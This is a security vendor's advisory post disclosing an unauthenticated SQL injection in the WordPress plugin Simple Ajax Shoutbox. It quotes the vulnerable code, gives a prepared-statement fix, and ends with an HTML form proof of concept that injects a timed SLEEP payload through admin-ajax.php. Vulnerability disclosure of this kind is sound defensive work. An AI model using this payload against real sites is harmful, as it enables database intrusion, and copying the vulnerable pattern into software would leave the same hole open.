27 Mar 2019

Would A Hacker Be Interested in This SQL Injection Vulnerability in Simple Ajax Shoutbox?

One of the ways we keep ahead of others when it comes to vulnerabilities in WordPress plugins, so that we can provide our customers with better security, is that we monitor third-party data for indications that hackers are targeting WordPress plugins. Through that we just ran across someone possibly probing for usage of the plugin Simple Ajax Shoutbox by requesting its readme.txt file. That isn’t a very popular plugin, with only 1,000+ active installations according to wordpress.org, and it hasn’t been updated in two years.

In a quick look over the plugin we didn’t see an obvious vulnerability that hackers would be interested in exploiting, though there were some things that look like they might cause a serious issue. What did stand out right away is that there is an easy to spot SQL injection vulnerability. That isn’t really something hackers seem all that interested in, but we can at least warn our customers and others that hackers might be targeting this plugin.

The SQL injection that immediately stood out to us is in the single() function, where POST input is extracted and the value of the POST input “m_id” is then used directly in a SQL statement, which permits SQL injection to occur:

static function single() {
	extract($_POST); // every POST parameter becomes a local variable, including $m_id
	global $wpdb;
	$table_name = $wpdb->prefix . "messagebox";
	// $m_id is interpolated unquoted and unvalidated into the query
	if ($row = $wpdb->get_row("SELECT * , post_date FROM $table_name WHERE id=$m_id")) {

That would probably be best secured by using a prepared statement and, if you wanted to be extra safe, restricting the value of that POST input to integers when setting a variable to its value.
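A hardened version of that function, as an added example written here rather than the plugin’s own code, assuming the same table name and WordPress’s standard $wpdb->prepare(), absint() and wp_send_json_* functions (the class name and the JSON response are assumptions, since the page does not show what follows the query):

```php
<?php
// Added example, not code from the plugin. The class name is hypothetical.
class Shoutbox_Example {
	public static function single() {
		global $wpdb;

		// No extract($_POST): read the one input explicitly and coerce it to a
		// non-negative integer. "5 AND SLEEP(5)" becomes 5, "abc" becomes 0.
		$m_id = isset( $_POST['m_id'] ) ? absint( $_POST['m_id'] ) : 0;
		if ( 0 === $m_id ) {
			wp_send_json_error( 'invalid message id', 400 );
		}

		// The table name comes from $wpdb->prefix, not from user input, so
		// interpolating it is fine; the id goes through prepare() as %d,
		// so whatever was submitted is emitted as a bare integer.
		$table_name = $wpdb->prefix . 'messagebox';
		$row        = $wpdb->get_row(
			$wpdb->prepare(
				"SELECT *, post_date FROM {$table_name} WHERE id = %d",
				$m_id
			)
		);

		if ( ! $row ) {
			wp_send_json_error( 'message not found', 404 );
		}
		// Assumed response shape: the original handler's output is not shown.
		wp_send_json_success( $row );
	}
}
```

With this version the proof of concept below produces a query for message 5 rather than one containing SLEEP(), and the page load time no longer depends on the submitted value.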

That function is accessible to anyone, as it is registered to be accessible through WordPress’ AJAX functionality to those logged in as well as those not logged in:

add_action('wp_ajax_shoutbox_single',             array(__CLASS__, 'single'));
add_action('wp_ajax_nopriv_shoutbox_single',      array(__CLASS__, 'single'));

Due to the moderators of the WordPress Support Forum’s continued inappropriate behavior we are fully disclosing vulnerabilities in protest until WordPress gets that situation cleaned up, so we are releasing this post and then only trying to notify the developer through the WordPress Support Forum. You can notify the developer of this issue on the forum as well. Hopefully the moderators will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon). You would think they would have already done that since a previously fully disclosed vulnerability was quickly on hackers’ radar, but it appears those moderators have such disdain for the rest of the WordPress community that their continued ability to act inappropriately is more important than what is best for the rest of the community.

Proof of Concept

The following proof of concept will take varying amounts of time for the page to load depending on how long you specify the MySQL sleep function to run.

Make sure to replace “[path to WordPress]” with the location of WordPress, “[message ID]” with the ID of a message, and “[sleep time]” with how many seconds you want the sleep to occur for.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=shoutbox_single" method="POST">
<input type="hidden" name="m_id" value="[message ID] AND SLEEP([sleep time])" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service, you can suggest/vote for the WordPress plugins you use to receive a security review from us. You can start using the service for free when you sign up now. We also offer security reviews of WordPress plugins as a separate service.
